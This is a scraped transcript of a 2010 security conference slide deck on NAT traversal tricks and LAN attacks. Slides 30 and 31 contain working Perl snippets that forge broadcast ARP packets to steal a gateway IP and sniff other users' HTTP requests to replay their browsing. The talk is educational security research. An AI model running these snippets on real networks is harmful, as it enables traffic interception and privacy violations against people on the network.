network conquering: advanced lan manipulation
DESCRIPTION
NETWORK CONQUERING: Advanced LAN Manipulation. Samy Kamkar. July 10, 2010. LILAX. Who is Samy?. Co-Founder of Fonality, IP PBX Company Passionate Developer MySpace XSS Worm author ”Narcissistic Vulnerability Pimp” (aka Security Researcher for fun) Lady Gaga aficionado. - PowerPoint PPT PresentationTRANSCRIPT
![Page 1: NETWORK CONQUERING: Advanced LAN Manipulation](https://reader033.vdocument.in/reader033/viewer/2022051623/5681595b550346895dc697ca/html5/thumbnails/1.jpg)
NETWORK CONQUERING: Advanced LAN Manipulation
Samy Kamkar
July 10, 2010
1
LILAX
![Page 2: NETWORK CONQUERING: Advanced LAN Manipulation](https://reader033.vdocument.in/reader033/viewer/2022051623/5681595b550346895dc697ca/html5/thumbnails/2.jpg)
Who is Samy?
• Co-Founder of Fonality, IP PBX Company
• Passionate Developer
• MySpace XSS Worm author
• ”Narcissistic Vulnerability Pimp”
(aka Security Researcher for fun)
• Lady Gaga aficionado
2
![Page 3: NETWORK CONQUERING: Advanced LAN Manipulation](https://reader033.vdocument.in/reader033/viewer/2022051623/5681595b550346895dc697ca/html5/thumbnails/3.jpg)
Why am I talking?
• Bore you with NATs and how they work
• Entertain you with pictures
• Teach unknown “features” of NATs
• Learn interesting paradoxes of NATs
• Check out tools to evade NATs
• I like turtles
3
![Page 4: NETWORK CONQUERING: Advanced LAN Manipulation](https://reader033.vdocument.in/reader033/viewer/2022051623/5681595b550346895dc697ca/html5/thumbnails/4.jpg)
This is your network.
4
![Page 5: NETWORK CONQUERING: Advanced LAN Manipulation](https://reader033.vdocument.in/reader033/viewer/2022051623/5681595b550346895dc697ca/html5/thumbnails/5.jpg)
This is your network on drugs.
5
![Page 6: NETWORK CONQUERING: Advanced LAN Manipulation](https://reader033.vdocument.in/reader033/viewer/2022051623/5681595b550346895dc697ca/html5/thumbnails/6.jpg)
A NAT
6
![Page 7: NETWORK CONQUERING: Advanced LAN Manipulation](https://reader033.vdocument.in/reader033/viewer/2022051623/5681595b550346895dc697ca/html5/thumbnails/7.jpg)
Things that went out of style by early 2000
7
IPs
![Page 8: NETWORK CONQUERING: Advanced LAN Manipulation](https://reader033.vdocument.in/reader033/viewer/2022051623/5681595b550346895dc697ca/html5/thumbnails/8.jpg)
Onto the anatomy…
• Goal: penetrating a NAT from another NAT
• Typical NAT: when a packet is received, it’s normally only sent off to a client if it’s a packet from a pre-existing connection
• Thus, there should be no way to create a connection from one NAT to another if the destination NAT doesn’t allow unknown incoming packets
8
![Page 9: NETWORK CONQUERING: Advanced LAN Manipulation](https://reader033.vdocument.in/reader033/viewer/2022051623/5681595b550346895dc697ca/html5/thumbnails/9.jpg)
Our path for a typical packet.
9
![Page 10: NETWORK CONQUERING: Advanced LAN Manipulation](https://reader033.vdocument.in/reader033/viewer/2022051623/5681595b550346895dc697ca/html5/thumbnails/10.jpg)
Roadblock: the NAT? Nah…
• Educate: what is a NAT? How does it work?– …
10
![Page 11: NETWORK CONQUERING: Advanced LAN Manipulation](https://reader033.vdocument.in/reader033/viewer/2022051623/5681595b550346895dc697ca/html5/thumbnails/11.jpg)
Roadblock: the NAT? Nah…
• Educate: what is a NAT? How does it work?– NAT RFCs 1631, 2663– linux-source/net/ipv4/netfilter/nf_nat_*.c
• …
11
![Page 12: NETWORK CONQUERING: Advanced LAN Manipulation](https://reader033.vdocument.in/reader033/viewer/2022051623/5681595b550346895dc697ca/html5/thumbnails/12.jpg)
Roadblock: the NAT? Nah…
• Educate: what is a NAT? How does it work?– NAT RFCs 1631, 2663– linux-source/net/ipv4/netfilter/nf_nat_*.c
• Educate: what packets are normally allowed through? Part of what protocols?– …
12
![Page 13: NETWORK CONQUERING: Advanced LAN Manipulation](https://reader033.vdocument.in/reader033/viewer/2022051623/5681595b550346895dc697ca/html5/thumbnails/13.jpg)
Roadblock: the NAT? Nah…
• Educate: what is a NAT? How does it work?– NAT RFCs 1631, 2663– linux-source/net/ipv4/netfilter/nf_nat_*.c
• Educate: what packets are normally allowed through? Part of what protocols?– TCP, RFC 793
• RFC 5382 (NAT for TCP)– UDP, RFC 768
• RFC 4787 (NAT for UDP)– ICMP, RFC 792
• RFC 5508 (NAT for ICMP) 13
![Page 14: NETWORK CONQUERING: Advanced LAN Manipulation](https://reader033.vdocument.in/reader033/viewer/2022051623/5681595b550346895dc697ca/html5/thumbnails/14.jpg)
Educate: the protocols• We don’t know how to exploit the NAT.• Can we exploit the protocol?• TCP: only allows packets in from existing connections
– So what is an “existing connection”?– A packet that matches source/dest IP, source/dest port, and
seq/ack number (some of which are rewritten from the NAT)
14
![Page 15: NETWORK CONQUERING: Advanced LAN Manipulation](https://reader033.vdocument.in/reader033/viewer/2022051623/5681595b550346895dc697ca/html5/thumbnails/15.jpg)
Educate: the protocols• We don’t know how to exploit the NAT.• Can we exploit the protocol?• UDP: only allows packets in from existing
“connections” (despite being connection-less)– So what is an “existing connection”?– A packet that matches source/dest IP, source/dest port– Wait a second…we know the source/dest IP, and we can
control the source/dest ports… UDP Header
15
![Page 16: NETWORK CONQUERING: Advanced LAN Manipulation](https://reader033.vdocument.in/reader033/viewer/2022051623/5681595b550346895dc697ca/html5/thumbnails/16.jpg)
Our path for a typical packet.
16
![Page 17: NETWORK CONQUERING: Advanced LAN Manipulation](https://reader033.vdocument.in/reader033/viewer/2022051623/5681595b550346895dc697ca/html5/thumbnails/17.jpg)
17
![Page 18: NETWORK CONQUERING: Advanced LAN Manipulation](https://reader033.vdocument.in/reader033/viewer/2022051623/5681595b550346895dc697ca/html5/thumbnails/18.jpg)
But my NAT munges ports!
18
• Well, damn.• Some NATs randomize source port• 16 bits = 65536 possible ports• I can send ~550 packets in 1 second• So 65536 packets in 120 seconds
![Page 19: NETWORK CONQUERING: Advanced LAN Manipulation](https://reader033.vdocument.in/reader033/viewer/2022051623/5681595b550346895dc697ca/html5/thumbnails/19.jpg)
Birthday Paradox: to be 16 again
• Birthdays happen more often than you think. n = round( sqrt(-2 * ln(1 - probability_of_match)) * sqrt(total_items) )
19
![Page 20: NETWORK CONQUERING: Advanced LAN Manipulation](https://reader033.vdocument.in/reader033/viewer/2022051623/5681595b550346895dc697ca/html5/thumbnails/20.jpg)
Birthday Paradox: continued
• If each side sends 545 random source packets regardless of whether NAT munges ports,
there’s a 99% chance of collision!• 23 people in a room = 50% chance• 57 people = 99% chance• 366 people = 100% chance
20
![Page 21: NETWORK CONQUERING: Advanced LAN Manipulation](https://reader033.vdocument.in/reader033/viewer/2022051623/5681595b550346895dc697ca/html5/thumbnails/21.jpg)
21
![Page 22: NETWORK CONQUERING: Advanced LAN Manipulation](https://reader033.vdocument.in/reader033/viewer/2022051623/5681595b550346895dc697ca/html5/thumbnails/22.jpg)
True client-server model • How do we penetrate the NAT like a true client?• Can we exploit the protocol?• TCP: only allows packets in from existing connections
– So what is an “existing connection”?– A packet that matches source/dest IP, source/dest port, and
seq/ack number (some of which are rewritten from the NAT)
• UDP: only allows packets in from existing “connections” (despite being connection-less)– So what is an “existing connection”?– A packet that matches source/dest IP, source/dest port– But we don’t know the source IP…
22
![Page 23: NETWORK CONQUERING: Advanced LAN Manipulation](https://reader033.vdocument.in/reader033/viewer/2022051623/5681595b550346895dc697ca/html5/thumbnails/23.jpg)
True client-server model cont.• ICMP: Echo request
– Requests never penetrate NATs, will never hit a client
• …
23
![Page 24: NETWORK CONQUERING: Advanced LAN Manipulation](https://reader033.vdocument.in/reader033/viewer/2022051623/5681595b550346895dc697ca/html5/thumbnails/24.jpg)
True client-server model cont.• ICMP: Echo request
– Requests never penetrate NATs, will never hit a client
• ICMP: Echo reply– Replies only go through from a request– We know we can’t send a request, never penetrates a NAT
• …
24
![Page 25: NETWORK CONQUERING: Advanced LAN Manipulation](https://reader033.vdocument.in/reader033/viewer/2022051623/5681595b550346895dc697ca/html5/thumbnails/25.jpg)
True client-server model cont.• ICMP: Echo request
– Requests never penetrate NATs, will never hit a client
• ICMP: Echo reply– Replies only go through from a request– We know we can’t send a request, never penetrates a NAT
• ICMP: Time exceeded (traceroute)– Only goes through in response to an IP packet– Well, all computers can send IP packets– How does a time exceeded packet work?– Content of packet must contain packet originally sent out– We don’t know what the server sends out unless we
arbitrarily send out fixed packets that we later “respond to”
25
![Page 26: NETWORK CONQUERING: Advanced LAN Manipulation](https://reader033.vdocument.in/reader033/viewer/2022051623/5681595b550346895dc697ca/html5/thumbnails/26.jpg)
A Brief History of Crime
26
![Page 27: NETWORK CONQUERING: Advanced LAN Manipulation](https://reader033.vdocument.in/reader033/viewer/2022051623/5681595b550346895dc697ca/html5/thumbnails/27.jpg)
27
![Page 28: NETWORK CONQUERING: Advanced LAN Manipulation](https://reader033.vdocument.in/reader033/viewer/2022051623/5681595b550346895dc697ca/html5/thumbnails/28.jpg)
28
![Page 29: NETWORK CONQUERING: Advanced LAN Manipulation](https://reader033.vdocument.in/reader033/viewer/2022051623/5681595b550346895dc697ca/html5/thumbnails/29.jpg)
ARP Spoofing
29
ARP Spoofing
![Page 30: NETWORK CONQUERING: Advanced LAN Manipulation](https://reader033.vdocument.in/reader033/viewer/2022051623/5681595b550346895dc697ca/html5/thumbnails/30.jpg)
ARP Spoofing – Simple!my $raw = new Packet::Inject(device => $device); # inject raw packets!
my $eth = new Packet::Ethernet()->encode(); # eth pkt will broadcast
my $arp = new Packet::ARP(
sender_eth => "a:b:c:d:e:f", # our MAC
target_eth => ”ff:ff:ff:ff:ff:ff", # broadcast
sender_ip => ”10.0.0.1", # ip we’re stealing
target_ip => ”255.255.255.255” # notifying broadcast
)->encode(); # now we have a built packet $arp
$raw->open(); # open our device for injection
$raw->write(packet => $eth . $arp); # inject!!!
$raw->close();
30
![Page 31: NETWORK CONQUERING: Advanced LAN Manipulation](https://reader033.vdocument.in/reader033/viewer/2022051623/5681595b550346895dc697ca/html5/thumbnails/31.jpg)
Epic Browser Sniffing FTW sub callback {
my ($ud, $hdr, $pkt, $s) = @_;
$eth->decode($pkt); # decode ethernet packet
if ($eth->type == 0x0800) { # 0x0800 == IP packet
$ip->decode($eth->data); # decode IP packet
if ($ip->proto == 6) { # TCP packet
$tcp->decode($ip->data); # decode TCP packet
if ($tcp->dest_port == 80) { # HTTP packet
# read HTTP header
if ($tcp->data =~ /GET (\S+) HTTP.*?Host: (\S+)/s) {
# use applescript to open our browser!
system qq{osascript -e 'tell application "Safari”
to open location “http://$2$1”’};
}}}}} 31
![Page 32: NETWORK CONQUERING: Advanced LAN Manipulation](https://reader033.vdocument.in/reader033/viewer/2022051623/5681595b550346895dc697ca/html5/thumbnails/32.jpg)
32
![Page 33: NETWORK CONQUERING: Advanced LAN Manipulation](https://reader033.vdocument.in/reader033/viewer/2022051623/5681595b550346895dc697ca/html5/thumbnails/33.jpg)
Q&AA gentleman never asks.A lady never tells.
33
![Page 34: NETWORK CONQUERING: Advanced LAN Manipulation](https://reader033.vdocument.in/reader033/viewer/2022051623/5681595b550346895dc697ca/html5/thumbnails/34.jpg)
Finpwnat: samy.pl/pwnatchownat: samy.pl/chownatPacket: samy.pl/packet
Samy [email protected] twitter.com/SamyKamkar 34